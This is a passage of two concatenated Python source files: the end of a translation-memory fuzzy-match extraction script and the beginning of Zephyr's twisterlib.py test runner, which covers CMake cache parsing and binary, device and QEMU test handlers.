self._match(self.insrc_lines, 0)
else:
# Get the unique source sentences in insrc and split the data into chunks for multithreading
unique_insrc_chunks = self._get_unique_chunks(self.insrc_lines)
arg_list = []
for i in range(self.n_threads):
arg_list.append((unique_insrc_chunks[i], i))
processes = []
for i in range(self.n_threads):
p = multiprocessing.Process(target=self._match, args=(arg_list[i]))
processes.append(p)
p.start()
for process in processes:
process.join()
self.results_q.put("done")
writer_proc.join()
writer_proc.terminate()
logger.info("Extracting fuzzy matches took " + str(time.time() - start_time) + " to run")
def _writer(self, fout):
"""The writer process that writes the output as the expected format.
Intended to be run in a separate process that reads input from a queue and writes
it to an output file."""
with Path(fout).open("w", encoding="utf-8") as fhout:
while True:
# Fetch items from the queue
m = self.results_q.get()
# `break` if the item is 'done' (put there in `self.process()`)
if m == "done":
break
for tup in m:
tup_str = self._tuple2string(tup)
fhout.write(tup_str + "\n")
fhout.flush()
logger.info(f"Output written to {fout}")
def _match(self, input_lines, thread_id):
# Only show progress bar for the first process.
for i in tqdm(range(len(input_lines)), disable=thread_id != 0, desc="Progress process #0"):
matches = []
source = input_lines[i].strip()
source_tok = source.split()
if self.method in ["sent2vec", "stransformers"]:
matches = self.faiss_retriever.search(source, self.maxmatch, self.minscore, self.query_multiplier)
else:
if self.index is not None:
# Query the setsim index to collect high fuzzy match candidates
result = self.index.query(source_tok)
# Query result the format [(matchindex, similarity score)]
# Sort the results on similarity score
result.sort(key=itemgetter(1), reverse=True)
# Take the most similar n matches
result = result[: self.n_setsim_candidates]
# Get the similarity score for each candidate
for r in result:
idx = r[0]
# Keep the original string to write
candidate = self.tmsrc_lines[idx].strip()
# Skip if source and candidate are the same
if source == candidate:
continue
if self.method == "setsim":
# Keep setsim score
final_score = r[1]
elif self.method == "setsimeditdist":
# Calculate editdistance
final_score = self._get_editdistance(source, candidate)
else:
pass
# keep the match if within the threshold
if self.minscore <= final_score:
matches.append((source, idx, candidate, self.tmtgt_lines[idx].strip(), final_score))
# Get matches using editdistance only
elif self.method == "editdist":
for j in range(len(self.tmsrc_lines)):
candidate = self.tmsrc_lines[j].strip()
# Skip if source and candidate are the same
if source == candidate:
continue
ed_norm = self._get_editdistance(source, candidate)
if self.minscore <= ed_norm:
matches.append((source, j, candidate, self.tmtgt_lines[j].strip(), ed_norm))
if matches:
self.match_count += 1
# Keep matches only with unique translations (keep only one element with the same translation)
matches = self._remove_duplicate_matches(matches)
# Sort the matches based on match score and keep the best matches (maxmatch)
sorted_matches = sorted(matches, key=lambda x: (x[-1]), reverse=True)
matches = sorted_matches[: self.maxmatch]
else:
self.nomatch_count += 1
self.results_q.put(matches)
return
def main():
import argparse
cparser = argparse.ArgumentParser(description=__doc__)
cparser.add_argument(
"--tmsrc", help="Source text of the TM from which fuzzy matches will be extracted", required=True
)
cparser.add_argument(
"--tmtgt", help="Target text of the TM from which fuzzy matches will be extracted", required=True
)
cparser.add_argument(
"--insrc", help="Input source file to extract matches for (insrc is queried against tmsrc)", required=True
)
cparser.add_argument(
"--method",
help="Method to find fuzzy matches",
choices=["editdist", "setsim", "setsimeditdist", "sent2vec", "stransformers"],
required=True,
)
cparser.add_argument(
"--minscore",
help="Min fuzzy match score. Only matches with a" " similarity score of at least 'minscore' will be included",
required=True,
type=float,
)
cparser.add_argument(
"--maxmatch", help="Max number of fuzzy matches kept per source segment", required=True, type=int
)
cparser.add_argument(
"--model_name_or_path",
help="Path to sent2vec model (when `method` is sent2vec) or sentence-transformers model name"
" when method is stransformers (see https://www.sbert.net/docs/pretrained_models.html)",
)
cparser.add_argument(
"--faiss", help="Path to faiss index. Must be provided when `method` is sent2vec or stransformers"
)
cparser.add_argument(
"--threads", help="Number of threads. Must be 0 or 1 when using `use_cuda`", default=1, type=int
)
cparser.add_argument(
"--n_setsim_candidates", help="Number of fuzzy match candidates extracted by setsim", type=int, default=2000
)
cparser.add_argument(
"--setsim_function", help="Similarity function used by setsimsearch", type=str, default="containment_min"
)
cparser.add_argument(
"--use_cuda",
action="store_true",
help="Whether to use GPU for FAISS indexing and sentence-transformers. For this to work"
" properly `threads` should be 0 or 1.",
)
cparser.add_argument(
"-q",
"--query_multiplier",
help="(applies only to FAISS) Initially look for `query_multiplier * maxmatch`"
" matches to ensure that we find enough hits after filtering. If still not"
" enough matches, search the whole index",
type=int,
default=2,
)
cparser.add_argument(
"-v",
"--logging_level",
choices=["info", "debug"],
help="Set the information level of the logger. 'info' shows trivial information about the process. 'debug'"
" also notifies you when less matches are found than requested during semantic matching ",
default="info",
)
cargs = cparser.parse_args()
logger.setLevel(cargs.logging_level.upper())
matcher = FuzzyMatcher(
cargs.method,
cargs.maxmatch,
cargs.minscore,
cargs.n_setsim_candidates,
cargs.setsim_function,
cargs.threads,
cargs.model_name_or_path,
cargs.faiss,
cargs.use_cuda,
cargs.query_multiplier,
)
matcher.process(cargs.insrc, cargs.tmsrc, cargs.tmtgt)
if __name__ == "__main__":
main()
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If testsuite was broken by some error (e.g. timeout) it is necessary to
add information about next testcases, which were not be
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {} @ {} baud".format(serial_device, hardware.serial_baud))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.serial_baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
